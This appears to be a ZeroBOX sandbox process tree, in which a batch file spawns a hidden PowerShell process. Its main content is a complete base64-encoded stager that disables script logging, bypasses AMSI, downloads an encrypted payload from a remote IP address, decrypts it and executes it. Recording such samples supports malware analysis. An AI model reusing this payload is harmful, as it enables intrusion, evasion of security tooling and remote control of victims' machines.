| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lrAUN" C:\Users\test22\AppData\Local\Temp\Blogger-http.bat
3044
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Blogger-http.bat
  2196
  - powershell.exe powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAAMwApAHsAJAA4ADIAMgA9AFsAUgBlAGYAXQAuAEEAcwBzAEUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA4ADIAMgApAHsAJAAxADkAMQA9ACQAOAAyADIALgBHAGUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwAKQA7AEkARgAoACQAMQA5ADEAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAE8ATABMAEUAYwB0AGkATwBuAFMALgBHAEUAbgBFAHIAaQBDAC4ARABJAGMAdABJAE8ATgBBAHIAWQBbAFMAdABSAEkATgBHACwAUwBZAHMAdABlAG0ALgBPAEIAagBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAdgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAAxADkAMQBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEAbAB9AEUAbABzAGUAewBbAFMAQwBSAGkAcABUAEIATABvAEMAawBdAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAGwAVQBlACgAJABuAFUATABMACwAKABOAEUAVwAtAE8AYgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABJAG8AbgBTAC4ARwBlAG4ARQBSAEkAYwAuAEgAYQBTAGgAUwBlAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBmAF0ALgBBAFMAUwBFAG0AQgBsAHkALgBHAGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQB0AEYASQBFAEwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBFACgAJABuAFUAbABsACwAJABUAFIAdQBlACkAOwB9ADsAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMARQBQAE8ASQBuAFQATQBBAG4AQQBnAGUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAE8ATgBUAGkATgBVAGUAPQAwADsAJAA1ADYANgA9AE4ARQB3AC0ATwBCAEoAZQBDAHQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBMAEkAZQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AFQALgBFAE4AQwBPAEQASQBOAEcAXQA6ADoAVQBOAEkAQwBvAGQAZQAuAEcAZQBUAFMAdAByAGkAbgBHACgAWwBDAE8AbgB2AGUAUgBUAF0AOgA6AEYAcgBvAG0AQgBBAFMARQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkADUANgA2AC4ASABlAGEARABlAFIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANQA2ADYALgBQAFIATwB4AHkAPQBbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBXAGUAQgBSAGUAcQBVAEUAUwB0AF0AOgA6AEQAZQBmAGEAVQBMAFQAVwBFAGIAUAByAG8AeABZADsAJAA1ADYANgAuAFAAcgBPAHgAeQAuAEMAcgBFAGQAZQBOAFQASQBhAEwAcwAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBFAFQALgBDAFIARQBEAGUAbgB0AGkAQQBMAEMAQQBDAGgARQBdADoAOgBEAGUARgBhAFUAbAB0AE4AZQBUAHcAbwByAEsAQwBSAEUAZABlAE4AVABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANgA2AC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAcwB0AGUATQAuAFQAZQBYAFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAHQAZQBTACgAJwBvACoAUwAvAFIAdgBdAFsAWQAxAEoAWgA/ADgAcQBLADMATQBrAHQAQAA9AEIANwBsAGgAPgBDAEkALABQADIAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAE8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAA1ADYANgAuAEgARQBBAEQARQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIATQBUAGoAWQBpAEkAZQA9AHMALwBZADcAcwAvAEkAMQBaAFQAZgBEADUARQBEAEQAcABUADYANABtAEQATgBNAFQAYwBvAD0AIgApADsAJABEAGEAVABhAD0AJAA1ADYANgAuAEQAbwB3AG4AbABPAGEAZABEAGEAVABhACgAJABzAEUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAEQAQQB0AGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUATgBnAHQAaABdADsALQBqAG8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
    2160

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents